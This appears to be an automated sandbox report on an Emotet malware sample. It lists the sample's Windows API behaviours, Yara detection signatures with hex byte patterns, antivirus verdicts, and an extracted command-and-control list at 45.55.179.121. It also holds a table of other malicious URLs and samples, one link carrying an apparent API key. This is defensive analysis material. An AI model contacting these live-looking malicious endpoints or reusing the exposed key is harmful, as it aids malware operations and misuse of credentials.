Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,2_2_00458CB0
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,2_2_00456EDE
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,2_2_0045AF55
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: GetLocaleInfoW,2_2_0045AF08
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,2_2_0044AF15
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,2_2_0045AF21
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: GetLocaleInfoA,2_2_00458FB0
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_0045B094
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,2_2_004571A4
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0074E567 cpuid 0_2_0074E567
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\driverthunk.exe | Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0043A350 GetSystemTimeAsFileTime,__aulldiv,0_2_0043A350
Contains functionality to query time zone information
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0044FF31 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_0044FF31
Contains functionality to query windows version
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_00406428 _memset,GetVersionExA,0_2_00406428
Queries the cryptographic machine GUID
Source: C:\Windows\SysWOW64\driverthunk.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match | File source: 00000002.00000002.2031798136.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1999620941.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2792994904.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2029903542.0000000000601000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2029828683.00000000004A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2793212106.0000000000F51000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2031865725.00000000006A1000.00000020.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0041007A __EH_prolog3_GS,lstrlenW,__snwprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,0_2_0041007A
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0040EB5A CreateBindCtx,_wcslen,CoTaskMemFree,0_2_0040EB5A
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_0041007A __EH_prolog3_GS,lstrlenW,__snwprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,2_2_0041007A
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_0040EB5A CreateBindCtx,_wcslen,CoTaskMemFree,2_2_0040EB5A

Malware Configuration

Threatname: Emotet

{"C2 list": ["45.55.179.121/GfGV9Yv", "45.55.179.121:8080", "5.55.179.121:8080"]}

Behavior Graph

Simulations

Behavior and APIs

No simulations

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
3ki05193698.exe.exe | 77% | Virustotal |
3ki05193698.exe.exe | 100% | Avira | TR/AD.Emotet.lnvbd
3ki05193698.exe.exe | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
4.0.driverthunk.exe.400000.0.unpack | 100% | Avira | TR/AD.Emotet.lnvbd
0.0.3ki05193698.exe.exe.400000.0.unpack | 100% | Avira | TR/AD.Emotet.lnvbd
2.0.3ki05193698.exe.exe.400000.0.unpack | 100% | Avira | TR/AD.Emotet.lnvbd
3.0.driverthunk.exe.400000.0.unpack | 100% | Avira | TR/AD.Emotet.lnvbd

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://45.55.179.121:8080/GfGV9Yv | 0% | Avira URL Cloud | safe
http://45.55.179.121:8080/GfGV9Yvv | 0% | Avira URL Cloud | safe
http://45.55.179.121/GfGV9Yv | 0% | Avira URL Cloud | safe
http://45.55.179.121:8080/GfGV9Yve | 0% | Avira URL Cloud | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author
(matched strings are listed under each row)

00000000.00000002.1999763726.0000000002281000.00000020.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 58 15 29 02 85 C0
  • 0x5066:$snippet6: 33 C0 21 05 BC 3E 29 02 A3 B8 3E 29 02 39 05 70 03 29 02 74 18 40 A3 B8 3E 29 02 83 3C C5 70 03 ...
00000002.00000002.2031798136.00000000005F0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000002.00000002.2031798136.00000000005F0000.00000040.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 58 15 41 00 85 C0
  • 0x59a5:$snippet6: 33 C0 21 05 BC 3E 41 00 A3 B8 3E 41 00 39 05 70 03 41 00 74 18 40 A3 B8 3E 41 00 83 3C C5 70 03 ...
00000000.00000002.1999620941.0000000000740000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000000.00000002.1999620941.0000000000740000.00000040.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 58 15 41 00 85 C0
  • 0x59a5:$snippet6: 33 C0 21 05 BC 3E 41 00 A3 B8 3E 41 00 39 05 70 03 41 00 74 18 40 A3 B8 3E 41 00 83 3C C5 70 03 ...
00000004.00000002.2792994904.0000000000640000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000004.00000002.2792994904.0000000000640000.00000040.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 58 15 41 00 85 C0
  • 0x59a5:$snippet6: 33 C0 21 05 BC 3E 41 00 A3 B8 3E 41 00 39 05 70 03 41 00 74 18 40 A3 B8 3E 41 00 83 3C C5 70 03 ...
00000003.00000002.2029903542.0000000000601000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000003.00000002.2029903542.0000000000601000.00000020.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 58 15 61 00 85 C0
  • 0x5066:$snippet6: 33 C0 21 05 BC 3E 61 00 A3 B8 3E 61 00 39 05 70 03 61 00 74 18 40 A3 B8 3E 61 00 83 3C C5 70 03 ...
00000003.00000002.2029828683.00000000004A0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000003.00000002.2029828683.00000000004A0000.00000040.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 58 15 41 00 85 C0
  • 0x59a5:$snippet6: 33 C0 21 05 BC 3E 41 00 A3 B8 3E 41 00 39 05 70 03 41 00 74 18 40 A3 B8 3E 41 00 83 3C C5 70 03 ...
00000004.00000002.2793212106.0000000000F51000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000004.00000002.2793212106.0000000000F51000.00000020.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 58 15 F6 00 85 C0
  • 0x5066:$snippet6: 33 C0 21 05 BC 3E F6 00 A3 B8 3E F6 00 39 05 70 03 F6 00 74 18 40 A3 B8 3E F6 00 83 3C C5 70 03 ...
00000002.00000002.2031865725.00000000006A1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000002.00000002.2031865725.00000000006A1000.00000020.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 58 15 6B 00 85 C0
  • 0x5066:$snippet6: 33 C0 21 05 BC 3E 6B 00 A3 B8 3E 6B 00 39 05 70 03 6B 00 74 18 40 A3 B8 3E 6B 00 83 3C C5 70 03 ...

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

Match         | Associated Sample Name / URL           | Detection
45.55.179.121 | https://library.mju.ac.th/2018/CFjDEs/ | malicious
  Context: • 45.55.179.121:8080/mmrtTAvO2T5

Domains

No context

ASN

Match   | Associated Sample Name / URL | Detection | Context
unknown | _NT2XFX_.js | malicious | 154.205.112.217
        | _NT2XFX_.js | malicious | 154.205.112.217
        | Mobile Spy.apk | malicious | 216.58.201.99
        | Lovetrap.apk | malicious | 172.217.23.234
        | live.photo.savanna.apk | malicious | 216.58.201.66
        | krep.itmtd.ywtjexf-1.apk | malicious | 216.58.201.99
        | com.chistespicanticos.apk | malicious | 172.217.23.194
        | sample.docx.docm | malicious | 79.98.26.38
        | com.saavn.android.apk | malicious | 172.217.23.202
        | com.droiddream.bowlingtime.apk | malicious | 216.58.201.99
        | AndroidDogowar.apk | malicious | 216.58.201.99
        | r1J9BmHm56.apk | malicious | 172.217.23.200
        | 0ooAhFTIPf.apk | malicious | 216.58.201.99
        | payload.ps1 | malicious | 140.82.60.155
        | https://u8883493.ct.sendgrid.net/ls/click?upn=sKpBeRQJbRj98yQ2Bt6p3glQU6nGQ-2BDn15x1douxdBOg-2BK36b6hVi6TvgHv63gzeDaTRj3ibCUfFvUk8ZaApuBqxRutflZATuRlEF6JwQsA-3DUikn_GIJTWyV-2Fi-2BZgXW-2BRuYM2g14tCulIkLM52ePWL3JMXcdujDpKKN0-2Brm4WTUJVmjwG5RKbrdbQhQzu7W9SMLJbMcbJ98JTOGgkI7MJugiwggs4h33x4u7bO8jwm7BCZewPjSyAU0NUtbAbXwYa4MNmgQu1omoGkFOWIHXWraDEoKrALaQ6KwZUZENog8WhI86ItPtziNoznETQd-2B9xJYkB75h9y4ykjyQTC-2BFQo6-2Fyr4UN29fpDfK2eUPRZMMjUzawaADNr0ROmXEr7e-2FgwN6q6WQVLfTKuv72D6ECClucf8kJIt-2B8EFJgxeAesF5cilkGZPHr18eDLlinZGE6903GnvumVM6xB6CUZFPtei5WnGMqUCXo1ZEn6m9vqhpnWP-2FG3kkQQo9546WOYLtPe2wV2uzP7Cfcp4N6IuE-2FGRGRnxz03hV3np5kyzr6MYwPfNIb2VqUADOslT9PRsIp9R-2BqetrC3IqLixjQYvNSi8I1UiUGOlVzTmCZDab-2FuncJyXL2PooUecTInNm0Hz4-2BD7OiD2a3l5OMgqNBb6WglNck6yPMZpfxyHb8yuatZM-2B5rPeOirEsFDusWh5EIwnbmPwRf6bBVj2QxbPi94-2BuBinma4Qb3TkLjVR8PQSSRa5a-2BisU | malicious | 167.89.115.54
        | https://www.virustotal.com/intelligence/download/?hash=8301e9d30d33146a74a2138cb495e9427735f5dc177ae356c28fddac8c23c93d&apikey=8ff39c8f441bc2a07896448d96eadcfd34fc64b2750cdf7b74ebfc6e63975a7c | malicious | 74.125.34.46
        | http://criticalltech.com | malicious | 64.58.121.60
        | https://docs.google.com/document/d/e/2PACX-1vSP0HJFPoeSBqJRWYHsUef8HuCaQ7etY13CnYwWhcjbljiGliK7sWMbXGMr0cZRRmB3LneMKv7Oj_a4/pub | malicious | 172.217.23.193
        | http://h43.felixismymaster.online/ | malicious | 35.244.209.32
        | g0wiavwv.exe | malicious | 82.118.22.178

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.